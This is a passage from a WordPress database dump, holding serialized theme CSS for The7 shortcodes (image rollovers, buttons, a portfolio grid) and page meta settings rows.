solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-505ca736a9ea6ca0b5a6ef0303f8de4e .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"d278efa81b06875c258469d1f70fff6e\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-d278efa81b06875c258469d1f70fff6e.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-d278efa81b06875c258469d1f70fff6e.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-d278efa81b06875c258469d1f70fff6e .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-d278efa81b06875c258469d1f70fff6e .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"de1d9f57ca4cb66e35af7125e39512cd\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-de1d9f57ca4cb66e35af7125e39512cd.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-de1d9f57ca4cb66e35af7125e39512cd.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-de1d9f57ca4cb66e35af7125e39512cd .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-de1d9f57ca4cb66e35af7125e39512cd .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"4a4beaf91472ad5ccd4ff994c0447ade\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-4a4beaf91472ad5ccd4ff994c0447ade.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-4a4beaf91472ad5ccd4ff994c0447ade.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-4a4beaf91472ad5ccd4ff994c0447ade .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-4a4beaf91472ad5ccd4ff994c0447ade .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"f833198745c25158806984d16e47348f\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-f833198745c25158806984d16e47348f.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-f833198745c25158806984d16e47348f.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-f833198745c25158806984d16e47348f .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-f833198745c25158806984d16e47348f .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"88b998c7c5ef6949627c1a032d0062e7\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-88b998c7c5ef6949627c1a032d0062e7.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-88b998c7c5ef6949627c1a032d0062e7.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-88b998c7c5ef6949627c1a032d0062e7 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-88b998c7c5ef6949627c1a032d0062e7 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"6320bff22a0ca75245251a1d017c6c87\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-6320bff22a0ca75245251a1d017c6c87.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-6320bff22a0ca75245251a1d017c6c87.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-6320bff22a0ca75245251a1d017c6c87 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-6320bff22a0ca75245251a1d017c6c87 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"1576aa786d2a21d8d6ec70fb4eeff425\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-1576aa786d2a21d8d6ec70fb4eeff425.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-1576aa786d2a21d8d6ec70fb4eeff425.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-1576aa786d2a21d8d6ec70fb4eeff425 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-1576aa786d2a21d8d6ec70fb4eeff425 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"f5903a782d27ffa205465b9767de3a07\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-f5903a782d27ffa205465b9767de3a07.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-f5903a782d27ffa205465b9767de3a07.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-f5903a782d27ffa205465b9767de3a07 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-f5903a782d27ffa205465b9767de3a07 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"12b4c8b34d714fdfac23a73f5a6a6cd6\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-12b4c8b34d714fdfac23a73f5a6a6cd6.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-12b4c8b34d714fdfac23a73f5a6a6cd6.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-12b4c8b34d714fdfac23a73f5a6a6cd6 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-12b4c8b34d714fdfac23a73f5a6a6cd6 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"e95e891419807077dc188e33a6344322\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-e95e891419807077dc188e33a6344322.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-e95e891419807077dc188e33a6344322.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-e95e891419807077dc188e33a6344322 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-e95e891419807077dc188e33a6344322 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"e42bcbc7965cdb69ea129d069908f61a\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-e42bcbc7965cdb69ea129d069908f61a.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-e42bcbc7965cdb69ea129d069908f61a.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-e42bcbc7965cdb69ea129d069908f61a .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-e42bcbc7965cdb69ea129d069908f61a .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"76a680fa4d6333649c9f1af8655c3de2\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-76a680fa4d6333649c9f1af8655c3de2.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-76a680fa4d6333649c9f1af8655c3de2.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-76a680fa4d6333649c9f1af8655c3de2 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-76a680fa4d6333649c9f1af8655c3de2 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"69b0f87c24aea173ecd322b1c8b3afce\";s:185:\"#default-btn-69b0f87c24aea173ecd322b1c8b3afce.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-69b0f87c24aea173ecd322b1c8b3afce > i {\n  margin-right: 8px;\n}\n\";s:32:\"02d3652306e4dc142ba7a5900b00a0cc\";s:185:\"#default-btn-02d3652306e4dc142ba7a5900b00a0cc.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-02d3652306e4dc142ba7a5900b00a0cc > i {\n  margin-right: 8px;\n}\n\";s:32:\"54529a299f2d57664876d1ba7883577c\";s:187:\"#default-btn-54529a299f2d57664876d1ba7883577c.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 12px;\n}\n#default-btn-54529a299f2d57664876d1ba7883577c > i {\n  margin-right: 12px;\n}\n\";}'),
(4003,2167,'_edit_last','1'),
(4098,51,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4099,51,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4100,51,'_edit_last','1'),
(4101,51,'_wp_page_template','default'),
(4102,51,'slide_template','default'),
(4103,51,'_wpb_vc_js_status','true'),
(4104,51,'_dt_sidebar_position','disabled'),
(4105,51,'_dt_sidebar_widgetarea_id','sidebar_1'),
(4106,51,'_dt_sidebar_hide_on_mobile','0'),
(4107,51,'_dt_footer_show','0'),
(4108,51,'_dt_footer_widgetarea_id','sidebar_2'),
(4109,51,'_dt_footer_hide_on_mobile','0'),
(4110,51,'_dt_header_title','enabled'),
(4111,51,'_dt_header_background','normal'),
(4112,51,'_dt_header_background_below_slideshow','disabled'),
(4113,51,'_dt_header_transparent_bg_color','#000000'),
(4114,51,'_dt_header_transparent_bg_opacity','50'),
(4115,51,'_dt_header_transparent_bg_color_scheme','light'),
(4116,51,'_dt_header_disabled_background','normal'),
(4117,51,'_dt_header_disabled_transparent_bg_color','#000000'),
(4118,51,'_dt_header_disabled_transparent_bg_opacity','50'),
(4119,51,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(4120,51,'_dt_header_transparent_top_bar_bg_color',''),
(4121,51,'_dt_header_transparent_top_bar_bg_opacity','0'),
(4122,51,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(4123,51,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(4124,51,'_dt_page_overrides_top_margin',''),
(4125,51,'_dt_page_overrides_bottom_margin',''),
(4126,51,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\n  margin-top: ;\n  padding-top: 0;\n  border-color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\n  width: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\n  margin-top: -100px;\n  width: 75%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\n  margin-top: 0;\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\n  margin-top: 0;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\n  background: #f7f7f7;\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\n  background: #f7f7f7;\n  padding: 30px 30px 30px 30px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\n  display: none;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\n  background: #f7f7f7;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\n  top: 20px;\n  right: 20px;\n  bottom: 20px;\n  left: 20px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\n  right: 30px;\n  left: 30px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\n  background: none;\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\n  background: #f7f7f7;\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\n  bottom: -15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\n  bottom: -5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\n  bottom: -20px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\n  bottom: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\n  color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\n  color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\n  margin-top: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n  padding-top: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\n  background: ;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: ;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: \"\";\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\n  box-shadow: \"\";\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\n  border-width: 0px;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-style: ;\n  font-weight: bold;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\n  font-style: ;\n  font-weight: ;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\n  margin-bottom: 5px;\n  font-style: ;\n  font-weight: ;\n  text-transform: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid 